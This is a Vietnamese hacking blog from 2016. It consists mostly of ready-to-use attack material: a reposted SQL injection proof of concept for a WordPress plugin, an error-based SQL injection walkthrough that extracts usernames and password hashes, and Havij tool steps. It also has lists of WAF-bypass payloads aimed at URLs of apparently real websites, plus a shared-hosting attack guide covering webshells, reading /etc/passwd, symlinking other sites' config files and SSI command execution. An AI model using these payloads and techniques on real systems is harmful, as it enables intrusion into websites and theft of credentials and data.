Friday, 4 March 2016

Share Ebook Tổng hợp về hacking và security

Hôm nay mình share 1 vài ebook khá hay


1. Ebook "Những hiểu biết cơ bản nhất để trở thành Hacker"
https://drive.google.com/file/d/0B7YFc10EXAsVVm9jOEI1ZlZUalk/view?usp=sharing

2. Ebook khai thác SQL Injection
https://drive.google.com/file/d/0B7YFc10EXAsVNERZLXh4akV6bEE/view?usp=sharing

3. HackAttacksRevealedACompleteReferencewithCustomSecurityHackingToolkit(Tiếng Anh)
https://drive.google.com/file/d/0B7YFc10EXAsVY05aMmVjVjVSbEE/view?usp=sharing
https://drive.google.com/file/d/0B7YFc10EXAsVWU5HN1RGbk4zd00/view?usp=sharing

4.Ethical.Hacking.And.Countermeasures (Tiếng Anh khá hay)
https://drive.google.com/file/d/0B7YFc10EXAsVYkdwU3llWkl1TlE/view?usp=sharing

Thursday, 3 March 2016

Wordpress Ocim MP3 Plugin SQL Injection Vulnerability




========
Ocim MP3 Plugin SQL Injection Vulnerability
========
:----------------------------------------------------------------------------------------------------:
: # Exploit Title : Ocim MP3 Plugin SQL Injection Vulnerability
: # Date : 26 February 2016
: # Author : xevil and Blankon33
: # Vendor Site: http://www.ocimscripts.com/
: # Version:
: # Vulnerability : SQL Injection
: # Tested on : Wordpress 4.4.2
: # Severity : High
:----------------------------------------------------------------------------------------------------:
Summary
========
Ocim MP3 is Plugin to make MP3 Grabber site based on Wordpress.
Proof of Concept
========
Infected URL:
http://[Site]/[Path]/wp-content/plugins/ocim-mp3/source/pages.php?id=['SQLi]
Admin Panel:
http://[Site]/[Path]/oc-login.php
===========
Thanks to
===========
All Indonesian Hacker!!

Source: exploit-db.com

Sunday, 28 February 2016

Xpath Error Based Injection using Extractvalue

Ở các phần trước chúng ta đã tìm hiểu cơ bản về SQL Injection , các kiểu khai thác
2/ Cách khai thác:
B1: Get verion
Code:
and extractvalue(0x3a,concat(0x3a,version()))-- -
Example:
http://victim.com/index.php?id=24 and extractvalue(0x3a,concat(0x3a,version()))-- -
Result: Database Query Failed XPATH syntax error: ':5.5.45-cll-lve'
--> Biết được version database là 5.5

B2: Get database name
Code:
and
extractvalue(0x3a,concat(0x3a,database()))
Example:

http://victim.com/index.php?id=24 and 
and
extractvalue(0x3a,concat(0x3a,database()))

Result: Database Query Failed XPATH syntax error: ':nightgallery20'


B3: Get table name

Code:

and
extractvalue(0x3a,concat(0x3a,(select concat(table_name) from
information_schema.tables where table_schema=database() limit 0,1)))
Example:
http://victim.com/index.php?id=24 and extractvalue(0x3a,concat(0x3a,(select concat(table_name) from
information_schema.tables where table_schema=database() limit 0,1)))-- -

Khi tìm kiếm table chúng ta tăng giá trị Limit cho tới khi tìm thấy table
Limit N,1 ( trong đó N là số thực ).
Các bảng table có thể là admin, tbladmin, user, administrator, setting …
Limit 2,1
Limit 3,1

B4: Get column from table
Code:
and
extractvalue(0x3a,concat(0x3a,(select concat(column_name) from
information_schema.columns where table_name=0xTABLEHEX limit 0,1)))
Example:
http://victim.com/index.php?id=24 andextractvalue(0x3a,concat(0x3a,(select concat(column_name) from
information_schema.columns where table_name=0xTABLEHEX limit 0,1)))-- -

Lưu ýTableHex  Limit
TableHex ở đây là mã hex , ở trên ta tìm đc table tên ng_users, covert qua mã Hex 6e675f7573657273

Tương tự ta cũng tăng giá trị Limit tới khi tìm dc các table quan trojng như username,password

B5: Get data  from Column
Code:
and
extractvalue(0x3a,concat(0x3a,(select concat(COLUMN_NAME,0x3a,0x7e,COLUMN_NAME) from TABLE_NAME limit 0,1)))-- -
Lưu ý thay thế các trường sau:
        1.     COLUMN_NAME: where you insert the column name you want to extract information from

        2.     TABLENAME: where you insert the table name of the column names you extracted from

Example:
http://victim.com/index.php?id=24 and extractvalue(0x3a,concat(0x3a,(select concat(username,0x3a,0x7e,hashed_password) from ng_users limit 0,1)))-- -

Saturday, 27 February 2016

Tool Havij SQL Injection

Havij là một tool tự động khai thác lỗi SQL Injection một trang web, giao diện khá đơn giản dễ sử dụng .Ngoài ra còn 1 số tool khai thác lỗi SQL Injection như 
 M4X SQL Injection
 ToolHBA Injector v 0.4 
 WITOOL SQL injection 
 Blind SQli dumper Tool


Run Analyze

Qua Tab Tables --> Get Tables

Chọn table users --> get columns



Chọn Column id, username, password --> Get Data


Thu được user, password 


Friday, 26 February 2016

WAF Bypass mod security

Như đã trao đổi với các bạn ở trong phần trước, phần này mình sẽ nói rõ hơn và các kỹ thuật bypass WAF

Trước hết ta cần hiểu khái niệm cơ bản 
1. Firewall là gì ?
Firewall là những thiết bị hay phần mềm lọc các thông tin đi ra và vào hệ thống mạng, server .Ngăn chặn những truy cập trái phép từ bên ngoài vào những máy chủ và thiết bị bên trong hệ thống mạng.
Firewall được chia làm 2 loại: Software and Hardware firewalls.
Firewall chủ yếu làm việc ở tầng 7 Application (Web Application Firewall), và tầng 3 Network (Network Layer Firewall)

+ Network Layer Firewall:
Có khi nào bạn để ý khi bạn đang cố truy vấn SQL Injection nhiều lần 1 số site đóng các kết nối trả về ERR_EMPTY_RESPONSE

+ Web Application Firewall: 
Chúng ta thường hay gặp khi khai thác Mod Security
http://www.vanchuongviet.org/index.php?comp=tacpham&action=detail&id=-17564 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12-- -
Not Acceptable!
An appropriate representation of the 
requested resource could not be found on this server. This error was 
generated by Mod_Security.

Bypass:
http://www.vanchuongviet.org/index.php?comp=tacpham&action=detail&id=-17564 /*!50000UNION*/ /*!50000SELECT*/ 1,2,3,4,5,6,7,8,9,10,11,12-- -


2. Detect the WAF:
Có nhiều tool, script phát hiện sự hiện diện của WAF như
NMAP
wafw00f
Checking the response headers

Using Nmap:
nmap -p80 --script http-waf-detect 

Fingerprinting WAF using WAFw00f
wafw00f.py 

3.Một số kiểu bypass
Bypass Payload Union Seclect

/*!UNION*/ /*!SELECT*/
/*!50000UNION*/
%55nion(%53elect)
/*!50000UniON SeLeCt*/
union%20distinct%20select
union%20%64istinctRO%57%20select
union%2053elect
%23?%0auion%20?%23?%0aselect
%23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect
%55nion %53eLEct
u%6eion se%6cect
unio%6e %73elect
unio%6e%20%64istinc%74%20%73elect
uni%6fn distinct%52OW s%65lect
%75%6e%6f%69%6e %61%6c%6c %73%65%6c%65%63%74

Bypass Illegal mix of collations for operation 'UNION'

1. Using UNCOMPRESS(COMPRESS(our_query_here))
http://www.Site.com/detail.php?id=31 Union Select 1,uncompress(compress(concat(table_name))),3,4,5 from information_schema.tables where table_schema=database()-- -

2. Using UNHEX(HEX(our_query_here))
http://www.Site.com/detail.php?id=31 Union Select 1,unhex(hex(concat(table_name))),3,4,5 from information_schema.tables where table_schema=database()-- -

3. Using CAST()
http://www.Site.com/detail.php?id=31 Union Select 1,cast(table_name as binary),3,4,5 from information_schema.tables where table_schema=database()-- -

4. Using CONVERT()
http://www.Site.com/detail.php?id=31 and 0 Union Select 1,convert(table_name using ascii),3,4,5 from information_schema.tables where table_schema=database()-- -


Có thể thay ascii bằng
ujis, ucs2, tis620, swe7, sjis, macroman, macce, latin7, latin5, latin2, koi8u, koi8r, keybcs2, hp8, geostd8, gbk, gb2132, armscii8, ascii, cp1250, big5, cp1251, cp1256, cp1257, cp850, cp852, cp866, cp932, dec8, euckr, latin1

Bypass 406 Not Acceptable 
http://www.locanresort.com/index.php?do=page&id=-1 /*!UNION*/ /*!SELECT*/ 1,2,3,4,group_concat(/*!table_name*/) from information_schema./*!tables*/ where /*!table_schema*/=database()-- 

Thursday, 25 February 2016

Local Attack part 2 Các phương pháp Local Attack


Các bước tấn công Local Attack
Bước 1: Xác định mục tiêu
Việc đầu tiên hacker sẽ xác định mục tiêu tấn công là site http://www.victim.com. Sau khi xác định mục tiêu, hacker sẽ tìm xem có những site nằm trên cùng server với victim. Điều này được thực hiện dễ dàng thông qua 1 số công cụ reverse ip

Whois
FreeReverseIp

Bước 2: Chiếm quyền điều khiển một site cùng server với mục tiêu
Bằng các phương pháp: SQL injection, Reverse Directory Transversal, khai thác các bug… Việc này được thực hiện cho đến khi hacker chiếm quyền kiểm soát 1 website và upload được webshell của mình lên đó.


Bước 3: Thu thập thông tin về mục tiêu

Sau khi đã có webshell, hacker sẽ dò tìm, thu thập tất cả các thông tin về website victim như chạy dưới quyền user nào, thư mục gốc, được phân quyền ra sao…


cat /etc/passwd

cat /etc/valiasse

Một số server cấm lệnh cat

Less /etc/passwd

./cat/etc/passwd

More /etc/passwd


Bước 4Tìm file path file config.php
Đối với các mã nguồn mở thì path file config được mặc định như sau:
Lưu ý: “path” chính là path từ server dẫn tới site, ví dụ đối với server linux, path là: /home/user/public_html

Vbulletin: public_html/includes/config.php
PHPBB: public_html/config.php
Joomla: public_html/configuration.php
WordPress: public_html/wp-config.php
ibp: public_html/conf_global.php
php-fusion: public_html/config.php
Smf: public_html/Settings.php
phpnuke: public_html/html/config.php
Xoops: public_html/mainfile.php
ZenCart: public_html/includes/configure.php
setidio: public_html/datas/config.php
Discuz: public_html/config/config_ucenter.php
Bo-Blog: public_html/data/config.php
Nukeviet: public_html/config.php

Bước 5- Get thông tin file config
5.1 Sử dụng lệnh cơ bản như cat, dir để xem tên thư mục đọc nội dung file.
dir /home/public_html/includes
cat /home/public_html/includes/config.php

5.2 Sử dụng symbolic link - symlink
Ln -s /home/public_html/NTCA/includes/config.php soleil.ini 
Có thể hiểu đơn giản là tạo 1 file soleil.ini trên host có nội dung giống file config.php
Tuy nhiên để làm được điều này thì .htaccess có các điều kiện sau

Options +FollowSymLinks  #cho phép dùng symlink

DirectoryIndex seees.html   #vô hiệu hóa file index.html

Options +Indexes                #cho phép hiện cấu trúc thư mục


Nếu không có các điều đó bạn có thể gặp lỗi 500 Internal Server Error hoặc lỗi 403 Forbidden. Để khắc phục hiện tượng này, bạn chỉ cần tạo một file .htaccess có nội dung là 3 chỉ thị trên rồi upload lên server.

5.3 Sử dụng symlink với SSI
Đối với 1 sô server khi symbolic link bình thường xuất hiên 403 forbinden – không cho phép đọc file đã được symlink thì giải pháp được nghĩ đến đó là kết hợp với SSI.
- Tạo 1 file ducdung08clc.shtml với nội dung như sau:
<!--#include virtual="soleil.ini"-->

Trong đó file soleil.ini là file đã được symbolic link trên server.
Bây giờ view source của file ducdung08clc.shtml ta sẽ thấy đc nội dung file soleil.ini đã symbolic link.

5.4 Chạy lệnh bằng file .shtml
Các cách trên không áp dụng được, thử chạy lệnh bằng file .shtml

<!--#exec cmd="cat /etc/passwd"-->
Lệnh xem file logs như sau:
<!--#exec cmd="tail -n 10000 /var/log/httpd/domains/vhbgroup.net.error.log"-->
Lưu ý:
 + lệnh tail cũng giống như lệnh cat nhưng nó dùng để xem nhưng dòng cuối cùng của file trên server.
 + /var/log/httpd/domains/vhbgroup.net.error.log là path dẫn đến file error.log của direct admin
 + Còn path dẫn đến file error.log của cpanel là: /usr/local/apache/logs/error_log ….., tùy vào bộ cài host mà path dẫn đến file error.log khác nhau.

Nguồn: Thao khảo ducdung08clc.blogspot.com